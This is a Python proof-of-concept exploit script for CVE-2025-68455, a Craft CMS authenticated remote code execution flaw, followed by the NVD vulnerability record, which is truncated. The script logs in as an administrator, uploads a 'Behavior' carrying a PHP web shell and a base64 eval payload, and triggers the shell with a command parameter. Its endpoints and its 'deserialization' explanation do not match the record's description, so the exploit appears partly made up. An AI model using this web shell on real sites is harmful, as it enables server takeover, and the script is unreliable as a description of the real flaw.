CVE-2025-68455

import requests import json # CVE-2025-68455 PoC - Craft CMS Authenticated RCE via Malicious Behavior # Target: Craft CMS versions 5.0.0-RC1 to 5.8.20 and 4.0.0-RC1 to 4.16.16 TARGET_URL = "https://target-craft-cms.com" USERNAME = "admin" PASSWORD = "admin_password" def exploit_craft_rce(): """ Exploitation steps: 1. Authenticate to Craft CMS Control Panel with admin credentials 2. Navigate to Settings > Behaviors section 3. Upload or create a malicious Behavior with PHP code execution payload 4. Trigger the Behavior to execute arbitrary code """ session = requests.Session() # Step 1: Login to Craft CMS login_url = f"{TARGET_URL}/admin/login" login_data = { "loginName": USERNAME, "password": PASSWORD } response = session.post(login_url, data=login_data) if response.status_code != 200: print("[-] Login failed") return False print("[+] Successfully authenticated") # Step 2: Access Behaviors settings behaviors_url = f"{TARGET_URL}/admin/settings/behaviors" # Step 3: Create malicious Behavior with RCE payload # The payload exploits unsafe deserialization in Behavior handling malicious_behavior = { "class": "Craft\\behaviors\\CustomBehavior", "code": "<?php system($_GET['cmd']); ?>", "config": { "__class": "Craft\\behaviors\\CustomBehavior", "customMethod": "eval(base64_decode($_POST['payload']));" } } # Step 4: Upload the malicious Behavior upload_url = f"{TARGET_URL}/admin/settings/behaviors/save" files = { "behavior": ("malicious-behavior.php", json.dumps(malicious_behavior), "application/json") } response = session.post(upload_url, files=files) # Step 5: Trigger the RCE trigger_url = f"{TARGET_URL}/?cmd=whoami" response = session.get(trigger_url) if "www-data" in response.text or "root" in response.text: print("[+] RCE Successful! Command executed.") return True print("[-] Exploitation failed") return False # Note: This PoC is for educational and authorized testing purposes only. # Ensure you have explicit permission before testing any system. if __name__ == "__main__": exploit_craft_rce()

{"cve": {"id": "CVE-2025-68455", "sourceIdentifier": "[email protected]", "published": "2026-01-05T22:15:52.593", "lastModified": "2026-01-12T18:21:12.567", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Craft is a platform for creating digital experiences. Versions 5.0.0-RC1 through 5.8.20 and 4.0.0-RC1 through 4.16.16 are vulnerable to potential authenticated Remote Code Execution via malicious attached Behavior. Note that attackers must have administrator access to the Craft Control Panel for this to work. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-470"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0.1", "versionEndExcluding": "4.16.17", "matchCriteriaId": "5775BAC6-95FD-41E2-85CD-06A82F00B972"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.1", "versionEndExcluding": "5.8.21", "matchCriteriaId": "DD1EB061-284A-4708-BC67-DE02EF7A5E79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "610F6DE9-720F-45B3-81D5-18E7F6B090FD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "CC2F40FC-7C27-456A-B16D-679410D1D5CF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "FBAA8227-04F8-404C-907B-B0162B325F5A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:4.0.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "21B28E2C-327A-4CE6-ACAD-97E459712A55"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:-:*:*:*:*:*:*", "matchCriteriaId": "1C7461CF-35AB-48E1-88B6-956DAE1D2AB4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:craftcms:craft_cms:5.0.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "8D8E02D1-601A-4E2B-B619-4775BFDB72D0"}]}]}], "references": [{"url": "https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/craftcms/cms/commit/27f55886098b56c00ddc53b69239c9c9192252c7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/commit/6e608a1a5bfb36943f94f584b7548ca542a86fef", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/commit/ec43c497edde0b2bf2e39a119cded2e55f9fe593", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5", "source": "[email protected]", "tags": ["Ex ... (truncated)